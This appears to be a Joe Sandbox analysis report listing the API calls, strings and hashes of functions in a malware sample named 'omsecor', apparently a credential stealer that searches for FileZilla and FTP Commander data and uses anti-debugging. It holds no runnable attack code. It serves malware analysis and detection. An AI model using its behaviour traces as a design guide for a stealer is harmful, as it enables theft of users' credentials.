                          • Opcode ID: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                          • Opcode Fuzzy Hash: a6511d5d8b0c810daf140c5c911559c37a96c1275369982660b5569d586a1c5f
                          • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                          APIs
                          • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                          • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerWrite
                          • String ID: UniqueNum$x
                          • API String ID: 594998759-2399716736
                          • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                          • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$*filezilla*
                          • API String ID: 3438805939-758400021
                          • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                          • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$ftp*commander*
                          • API String ID: 3438805939-1149875651
                          • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                          • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094A9
                          • SysFreeString.OLEAUT32(?), ref: 004094AE
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: _blank$an.yandex.ru/count
                          • API String ID: 3341692771-25359924
                          • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                          • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                          • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                          • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateCurrentDirectoryModuleName
                          • String ID: \merocz.xc6
                          • API String ID: 3818821825-505599559
                          • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                          • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                          • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409868
                          • SysAllocString.OLEAUT32(?), ref: 00409876
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "URL"$"encrypted"
                          • API String ID: 2525500382-4151690107
                          • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                          • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004097ED
                          • SysAllocString.OLEAUT32(?), ref: 004097FB
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "domain"$"url"
                          • API String ID: 2525500382-2438671658
                          • Opcode ID: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction ID: 610bf4d9b2292206f8ef054453b19a236663fc5a2da35db14ea77673b97cd822
                          • Opcode Fuzzy Hash: 98133a6a8bfb7a18a2a86276567a63b94d588fd2e230135a268bf1c7eb2bd3b5
                          • Instruction Fuzzy Hash: 08F0A271A0021DA6CF41AAA9CC05FD637E8AB44348F1444B6F908F7281EA78EA188B94
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open
                          • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                          • API String ID: 71445658-3061378640
                          • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                          • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                            • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                            • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                          • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CloseEnvironmentExpandFreeOpenProcessQueryStringsValue
                          • String ID:
                          • API String ID: 3604167287-0
                          • Opcode ID: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction ID: 704a8cbe2313c99ccb7bf4cac6d27c9c5720caa44ca6f9902b9fd9ccb38d811f
                          • Opcode Fuzzy Hash: debf70bf2fb47a5e7b7c0995a40a49e648bf285b45755a0d6fc166e7e3eeac12
                          • Instruction Fuzzy Hash: 0521C871900626BBDF205B748E45ABF3668EF05328F10063EF561F22D0EB758D508658
                          APIs
                          • CharLowerW.USER32(00408E44,00000000,00000000,?,00408E44,00408795), ref: 004095A4
                          • CharLowerW.USER32(00408795), ref: 004095D8
                          • SysFreeString.OLEAUT32(00408795), ref: 00409608
                          • SysFreeString.OLEAUT32(00408E44), ref: 0040960D
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharFreeLowerString
                          • String ID:
                          • API String ID: 2335467167-0
                          • Opcode ID: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction ID: 6911929459278785efe31e607170db17e103bee024a9a22ae291265c1613d99e
                          • Opcode Fuzzy Hash: ff78d62f8bf35a608bc63f02c9c9fafbc1ea89148f156ec964e1e543baeabb3a
                          • Instruction Fuzzy Hash: 20116D72D00108BBDB019F9ADC85B9E7BB8EF44305F1544BAE405F21A1D779AE409F44
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004081A3
                          Strings
                          Memory Dump Source
                          • Source File: 00000018.00000002.2343123610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_24_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: -
                          • API String ID: 885266447-2547889144
                          • Opcode ID: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction ID: cbf3f064ca1262f0759db58cdf0f181467b31290bd4ebff5f053a9a619aca6df
                          • Opcode Fuzzy Hash: b815d9a6725b7b7d4663accafdf12bc662ce9b6e2c1759233b63132321253c45
                          • Instruction Fuzzy Hash: 58415D31D0422699CB2177B98E417BB61A9DF44758F1440BFF9C0B72C2EEBC5D8581AE

                          Control-flow Graph (rendered graph omitted; entry block 4012c0-4012e8: FindFirstFileA, call 401080)
                          APIs
                          • FindFirstFileA.KERNELBASE(ks clku .d,6C489B6B), ref: 004012DD
                            • Part of subcall function 00401080: GetTickCount.KERNEL32 ref: 00401096
                            • Part of subcall function 00401080: GetDesktopWindow.USER32 ref: 004010B8
                            • Part of subcall function 00401080: GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                            • Part of subcall function 00401080: GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?), ref: 0040114B
                            • Part of subcall function 00401080: GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                            • Part of subcall function 00401080: GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                            • Part of subcall function 00401080: GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopFileFindFirstGlobalNameTickTimesWindow
                          • String ID: ks clku .d
                          • API String ID: 973805369-4096487313
                          • Opcode ID: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction ID: 8201e92c16030f82e268503128fd01f75d7624b5287a074f0a6a6b49dcde2be8
                          • Opcode Fuzzy Hash: f572dfb4ccbad4a63051ea1b90dc6402510860d94203dc7c9fb76134c3d65c66
                          • Instruction Fuzzy Hash: 13C012701042448FC330AF24DE0ABAA37E4AB48300F00093AA5E8E60A4DA3455598A8A

                          Control-flow Graph

                          APIs
                          • GetTickCount.KERNEL32 ref: 00401096
                          • GetDesktopWindow.USER32 ref: 004010B8
                          • GetClassNameA.USER32(00000000,00000000,00000400), ref: 004010CC
                          • GlobalAlloc.KERNELBASE(00000000,000F6950), ref: 004010EE
                          • GetCurrentProcess.KERNEL32(?), ref: 0040114B
                          • GetProcessIoCounters.KERNEL32(00000000), ref: 0040114E
                          • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 004011B9
                          • GetProcessTimes.KERNELBASE(00000000), ref: 004011BC
                          Strings
                          • cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp, xrefs: 00401131
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Process$Current$AllocClassCountCountersDesktopGlobalNameTickTimesWindow
                          • String ID: cjkU dklu UUido c;aopi quio ,mvnciu cxklnsp
                          • API String ID: 509927810-2920797944
                          • Opcode ID: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction ID: 30898c1c04428891cb82ceb7e239a2b08516cd6c9376f1465321758e23d54b14
                          • Opcode Fuzzy Hash: e0b8abb97aa25d1df5e5a951dd4f26f151847d18626d26f9063e3e0a3aa5dc8f
                          • Instruction Fuzzy Hash: E55127F1D041744BDB288B298D54BB9BBF5ABC5305F0881BEE689B7381D5385A48CF28

                          Control-flow Graph (rendered graph omitted; entry block 407a98-407a9f: GetModuleHandleA; further blocks call GetProcAddress, VirtualProtect, and subroutines 407ab5 and 407b29)
                          APIs
                          • GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407AB5: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407AB5: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction ID: 53099f65029657388ac4b193d9ffb221688749bb3c6439a8311ebbe5e3b7996f
                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                          • Instruction Fuzzy Hash: B501CC00F4D24539DA2051754C0197F7AA89A533687141677A111B72D3D9BCBE0692BF

                          Control-flow Graph (rendered graph omitted; entry block 407a59-407a6e; further blocks call GetModuleHandleA, GetProcAddress, VirtualProtect, and subroutines 407a98 and 407b29)
                          APIs
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                            • Part of subcall function 00407A98: GetModuleHandleA.KERNEL32(00407A8F), ref: 00407A98
                            • Part of subcall function 00407A98: GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                            • Part of subcall function 00407A98: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcProtectVirtual
                          • String ID:
                          • API String ID: 2099061454-0
                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction ID: 8932c9a1b40894ead954c0166dfb712feb6fdadac19e13bdf209ed336a7ac0e8
                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                          • Instruction Fuzzy Hash: DE21F621A4D2416EEB2186B44C0166B7BE49B13368F1946A7D141EB2C3D1BC7D4687AB

                          Control-flow Graph (rendered graph omitted; entry block 407ab5-407abd: GetProcAddress; further blocks call VirtualProtect, GetModuleHandleA, and subroutine 407b29)
                          APIs
                          • GetProcAddress.KERNEL32(00000000,00407AA6), ref: 00407AB6
                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00407AA6,00407A8F), ref: 00407AC8
                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00407AA6,00407A8F), ref: 00407ADC
                          • GetModuleHandleA.KERNEL32(?,00407A8F), ref: 00407AEA
                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00407B12
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProcProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 2152742572-0
                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction ID: 39b30828dda2cca0c429c80848ec8113aa03dbdf6ed959677c669bf53de2d5ad
                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                          • Instruction Fuzzy Hash: 98F0F400E8D2043CEE2151B40C01ABBBBEC86633687241A27A211E72C3D4BC7E0692BB

                          Control-flow Graph (rendered graph omitted; entry block 402f3e-402f5c: HeapCreate; further blocks call 402ee3, 405045 and HeapDestroy)
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,004017AC,00000001), ref: 00402F4F
                          • HeapDestroy.KERNEL32 ref: 00402F85
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$CreateDestroy
                          • String ID:
                          • API String ID: 3296620671-0
                          • Opcode ID: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction ID: 98ebcd61208b82bef51758d9ec37e8992e6abd11400b15b10fa3614edeb5f36b
                          • Opcode Fuzzy Hash: 7bbac67fe878dc3ebcdb7e33c34032945d00a98356e3978511e20ae8c663db98
                          • Instruction Fuzzy Hash: D3E092706643029EEB40AB31AF0D72636E4E74078AF10843BF548F51E2EBBC8605AF4C
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004020B3
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004020C8
                          • UnhandledExceptionFilter.KERNEL32(00408204), ref: 004020D3
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 004020EF
                          • TerminateProcess.KERNEL32(00000000), ref: 004020F6
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          • API String ID: 2579439406-0
                          • Opcode ID: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction ID: b20ca496c67c0111f9bdb02fdd2caa8760b953d18a2e8655b2b95bf976f6fc72
                          • Opcode Fuzzy Hash: bf9e4dc40609aede9a22b05b14043da035278ae7b0f51125174d724f9b36215e
                          • Instruction Fuzzy Hash: 5321AEB5950304DFC710EF24EF48A453BB5BF88306F10403AE549B36A1E7B859A59F9E

                          Control-flow Graph (rendered graph omitted; entry block 402465-40246f; further blocks call GetStdHandle, WriteFile, GetModuleFileNameA and subroutines 404c30, 404b40, 404bcb, 404121, 404a82, 404a11 and 404854)
                          APIs
                          • _strcpy_s.LIBCMT ref: 004024D1
                          • __invoke_watson.LIBCMT ref: 004024E2
                          • GetModuleFileNameA.KERNEL32(00000000,0040B091,00000104), ref: 004024FE
                          • _strcpy_s.LIBCMT ref: 00402513
                          • __invoke_watson.LIBCMT ref: 00402526
                          • _strlen.LIBCMT ref: 0040252F
                          • _strlen.LIBCMT ref: 0040253C
                          • __invoke_watson.LIBCMT ref: 00402569
                          • _strcat_s.LIBCMT ref: 0040257C
                          • __invoke_watson.LIBCMT ref: 0040258D
                          • _strcat_s.LIBCMT ref: 0040259E
                          • __invoke_watson.LIBCMT ref: 004025AF
                          • GetStdHandle.KERNEL32(000000F4,?,?,00000000,77735E70,00000003,00402631,000000FC,0040667C,00000001,00000000,00000000,?,00403FFF,?,00000001), ref: 004025CE
                          • _strlen.LIBCMT ref: 004025EF
                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00403FFF,?,00000001,?,00403478,00000018,004093D0,0000000C,00403507,?), ref: 004025F9
                          Strings
                          Memory Dump Source
                          • Source File: 0000001A.00000002.2374099617.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000001A.00000002.2374028457.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374099617.000000000040D000.00000040.00000001.01000000.00000004.sdmp
                          • Associated: 0000001A.00000002.2374203937.0000000000422000.00000008.00000001.01000000.00000004.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_26_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                          • API String ID: 1879448924-4022980321
                          • Opcode ID: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction ID: 3ad8829dabe9c8e6b7970468b651ade891dcb41a26c93daa50347fadcc2e15d8
                          • Opcode Fuzzy Hash: 37e970e7a91dfcbae92fe90700a2f9926538e6433e08e305a6de03e0bd6f72c8
                          • Instruction Fuzzy Hash: CF3127B2A402153AE62136326F5EF2F314C9B91315F14013BFE09B26D6FABD9A1441FE

                          Control-flow Graph (rendered graph omitted; entry block 401e76-401e86: GetModuleHandleA; further blocks call GetProcAddress * 4, TlsAlloc, TlsSetValue, GetCurrentThreadId and subroutines 401bca, 402419, 401aaa, 403378, 401b21, 404032 and 401c07)
                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,004017BE), ref: 00401E7C
                          • __mtterm.LIBCMT ref: 00401E88
                            • Part of subcall function 00401BCA: TlsFree.KERNEL32(00000002,00401FF5), ref: 00401BF5
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000000), ref: 004033DC
                            • Part of subcall function 00401BCA: RtlDeleteCriticalSection.NTDLL(00000002), ref: 00403406
